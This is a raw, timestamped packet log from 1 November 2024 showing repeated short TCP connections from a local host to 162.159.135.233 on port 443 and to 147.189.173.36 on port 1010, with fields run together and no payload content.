                                            Nov 1, 2024 06:22:04.156106949 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.156162024 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.156167030 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.156208992 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.156527996 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.156542063 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.156586885 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.156590939 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.156614065 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.156627893 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.156944990 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.156958103 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.157013893 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.157020092 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.157064915 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.157109976 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.157114983 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.157129049 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.157171965 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.160003901 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.334569931 CET101049734147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:04.367716074 CET101049734147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:04.367784977 CET497341010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:04.368350983 CET497341010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:04.374219894 CET101049734147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:04.374278069 CET497341010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:04.482119083 CET497351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:04.488131046 CET101049735147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:04.488207102 CET497351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:04.740498066 CET497351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:04.745399952 CET101049735147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:04.745467901 CET497351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:04.750298977 CET101049735147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:05.173804998 CET101049735147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:05.205147028 CET101049735147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:05.205239058 CET497351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:05.206000090 CET497351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:05.211345911 CET101049735147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:05.211401939 CET497351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:05.326056004 CET497361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:05.330904961 CET101049736147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:05.330990076 CET497361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:05.482369900 CET497361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:05.487387896 CET101049736147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:05.487443924 CET497361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:05.492332935 CET101049736147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:06.001581907 CET101049736147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:06.034213066 CET101049736147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:06.034272909 CET497361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:06.034873009 CET497361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:06.039942980 CET101049736147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:06.040004015 CET497361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:06.154014111 CET497371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:06.158905983 CET101049737147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:06.158976078 CET497371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:06.463435888 CET497371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:06.468373060 CET101049737147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:06.468436003 CET497371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:06.473263979 CET101049737147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:06.870520115 CET101049737147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:06.903593063 CET101049737147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:06.903645992 CET497371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:06.904246092 CET497371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:06.909507036 CET101049737147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:06.909558058 CET497371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:07.036380053 CET497381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:07.045042992 CET101049738147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:07.045133114 CET497381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:07.071007967 CET497381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:07.075968027 CET101049738147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:07.076026917 CET497381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:07.081417084 CET101049738147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:07.731728077 CET101049738147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:07.764194012 CET101049738147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:07.764472961 CET497381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:07.772036076 CET497381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:07.777503967 CET101049738147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:07.777565956 CET497381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:07.893152952 CET497391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:07.898180008 CET101049739147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:07.899899006 CET497391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:08.520344019 CET497391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:08.525369883 CET101049739147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:08.525424957 CET497391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:08.539232016 CET101049739147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:08.720145941 CET101049739147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:08.753319025 CET101049739147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:08.753381968 CET497391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:08.753983974 CET497391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:08.759362936 CET101049739147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:08.759418964 CET497391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:08.872756958 CET497401010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:08.877665043 CET101049740147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:08.877763033 CET497401010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:09.145940065 CET497401010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:09.151161909 CET101049740147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:09.151233912 CET497401010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:09.156908989 CET101049740147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:09.564450979 CET101049740147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:09.597779036 CET101049740147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:09.597840071 CET497401010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:09.598608971 CET497401010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:09.604039907 CET101049740147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:09.604115009 CET497401010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:09.716362953 CET497411010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:09.721412897 CET101049741147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:09.721694946 CET497411010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:09.746536970 CET497411010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:09.751421928 CET101049741147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:09.751475096 CET497411010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:09.756302118 CET101049741147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:10.405754089 CET101049741147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:10.438621998 CET101049741147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:10.438685894 CET497411010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:10.439301014 CET497411010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:10.444601059 CET101049741147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:10.444684029 CET497411010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:10.703763962 CET497421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:10.708817005 CET101049742147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:10.710673094 CET497421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:11.080269098 CET497421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:11.085252047 CET101049742147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:11.085313082 CET497421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:11.090246916 CET101049742147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:11.394475937 CET101049742147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:11.427541971 CET101049742147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:11.427655935 CET497421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:11.428189039 CET497421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:11.433424950 CET101049742147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:11.433478117 CET497421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:11.544635057 CET497441010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:11.549973011 CET101049744147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:11.550069094 CET497441010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:11.779150009 CET497441010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:11.784049034 CET101049744147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:11.784110069 CET497441010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:11.789000034 CET101049744147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:12.240809917 CET101049744147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:12.270205021 CET101049744147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:12.270369053 CET497441010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:12.271258116 CET497441010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:12.277337074 CET101049744147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:12.277393103 CET497441010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:12.388274908 CET497461010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:12.393598080 CET101049746147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:12.393743038 CET497461010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:12.452445030 CET497461010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:12.457444906 CET101049746147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:12.457662106 CET497461010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:12.462749958 CET101049746147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:13.067003965 CET101049746147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:13.100483894 CET101049746147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:13.100702047 CET497461010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:13.101320982 CET497461010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:13.107003927 CET101049746147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:13.107171059 CET497461010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:13.216600895 CET497481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:13.221474886 CET101049748147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:13.221681118 CET497481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:13.377058983 CET497481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:13.384289026 CET101049748147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:13.384346962 CET497481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:13.391134977 CET101049748147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:13.926639080 CET101049748147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:13.959865093 CET101049748147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:13.959922075 CET497481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:13.960555077 CET497481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:13.965720892 CET101049748147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:13.965784073 CET497481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:14.075782061 CET497501010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:14.080821991 CET101049750147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:14.080909967 CET497501010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:14.563378096 CET497501010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:14.568361998 CET101049750147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:14.568562984 CET497501010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:14.573360920 CET101049750147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:14.776504993 CET101049750147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:14.809253931 CET101049750147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:14.809576035 CET497501010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:14.809993029 CET497501010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:14.815114021 CET101049750147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:14.815309048 CET497501010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:14.946091890 CET497521010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:14.951075077 CET101049752147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:14.952510118 CET497521010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:15.024481058 CET497521010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:15.029501915 CET101049752147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:15.029669046 CET497521010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:15.034482002 CET101049752147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:15.634504080 CET101049752147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:15.667499065 CET101049752147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:15.667562008 CET497521010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:15.668332100 CET497521010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:15.673449039 CET101049752147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:15.673510075 CET497521010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:15.779201031 CET497541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:15.784059048 CET101049754147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:15.784126997 CET497541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:15.811767101 CET497541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:15.816932917 CET101049754147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:15.816982985 CET497541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:15.821846008 CET101049754147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:16.479541063 CET101049754147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:16.512603998 CET101049754147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:16.512670040 CET497541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:16.513659000 CET497541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:16.518811941 CET101049754147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:16.518922091 CET497541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:16.622730970 CET497551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:16.627624989 CET101049755147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:16.628129005 CET497551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:16.699975014 CET497551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:16.704838991 CET101049755147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:16.704931974 CET497551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:16.710876942 CET101049755147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:17.296578884 CET101049755147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:17.328826904 CET101049755147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:17.332482100 CET497551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:17.334047079 CET497551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:17.339215040 CET101049755147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:17.339286089 CET497551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:17.451167107 CET497561010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:17.456118107 CET101049756147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:17.456216097 CET497561010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:17.487828970 CET497561010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:17.492778063 CET101049756147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:17.492834091 CET497561010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:17.497689962 CET101049756147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:18.139482021 CET101049756147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:18.172682047 CET101049756147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:18.172735929 CET497561010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:18.173331022 CET497561010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:18.178431034 CET101049756147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:18.178514004 CET497561010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:18.279248953 CET497571010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:18.284262896 CET101049757147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:18.284349918 CET497571010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:18.296803951 CET497571010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:18.301600933 CET101049757147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:18.301666975 CET497571010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:18.306443930 CET101049757147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:18.946381092 CET101049757147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:18.978197098 CET101049757147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:18.978421926 CET497571010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:18.979006052 CET497571010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:18.984311104 CET101049757147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:18.984373093 CET497571010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:19.149620056 CET497581010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:19.154726028 CET101049758147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:19.154805899 CET497581010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:19.190900087 CET497581010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:19.195730925 CET101049758147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:19.195787907 CET497581010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:19.200607061 CET101049758147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:19.826905012 CET101049758147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:19.860038996 CET101049758147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:19.862497091 CET497581010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:19.870929956 CET497581010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:19.876225948 CET101049758147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:19.878479004 CET497581010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:20.029516935 CET497591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:20.035392046 CET101049759147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:20.035461903 CET497591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:20.045645952 CET497591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:20.050697088 CET101049759147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:20.050750017 CET497591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:20.055613995 CET101049759147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:20.709105015 CET101049759147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:20.743737936 CET101049759147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:20.743793011 CET497591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:20.744509935 CET497591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:20.750498056 CET101049759147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:20.750551939 CET497591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:20.857283115 CET497601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:20.862166882 CET101049760147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:20.862242937 CET497601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:20.892545938 CET497601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:20.897422075 CET101049760147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:20.897468090 CET497601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:20.902817011 CET101049760147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:21.560112000 CET101049760147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:21.603424072 CET101049760147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:21.606745958 CET497601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:21.607336044 CET497601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:21.613264084 CET101049760147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:21.615149021 CET497601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:21.718502998 CET497611010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:21.723493099 CET101049761147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:21.723871946 CET497611010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:22.095091105 CET497611010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:22.100219965 CET101049761147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:22.102897882 CET497611010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:22.108949900 CET101049761147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:22.409917116 CET101049761147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:22.442490101 CET101049761147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:22.442678928 CET497611010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:22.449711084 CET497611010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:22.455688000 CET101049761147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:22.455751896 CET497611010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:22.600835085 CET497621010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:22.606270075 CET101049762147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:22.606338024 CET497621010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:22.873773098 CET497621010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:22.878679991 CET101049762147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:22.878734112 CET497621010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:22.883486986 CET101049762147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:23.290083885 CET101049762147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:23.322789907 CET101049762147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:23.322952986 CET497621010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:23.323512077 CET497621010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:23.328790903 CET101049762147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:23.328960896 CET497621010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:23.435925961 CET497631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:23.440912008 CET101049763147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:23.441026926 CET497631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:23.479568958 CET497631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:23.487560987 CET101049763147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:23.487617970 CET497631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:23.498862982 CET101049763147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:24.136012077 CET101049763147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:24.165163040 CET101049763147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:24.165220022 CET497631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:24.165993929 CET497631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:24.177256107 CET101049763147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:24.177318096 CET497631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:24.279020071 CET497641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:24.283880949 CET101049764147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:24.283960104 CET497641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:24.309912920 CET497641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:24.314964056 CET101049764147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:24.315026045 CET497641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:24.320827007 CET101049764147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:24.968806028 CET101049764147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:25.002135992 CET101049764147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:25.002197981 CET497641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.002732038 CET497641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.008078098 CET101049764147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:25.008148909 CET497641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.107772112 CET497651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.112811089 CET101049765147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:25.112900972 CET497651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.132771015 CET497651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.154685020 CET101049765147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:25.154761076 CET497651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.161216021 CET101049765147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:25.791645050 CET101049765147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:25.824747086 CET101049765147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:25.824825048 CET497651010192.168.2.4147.189.173.36
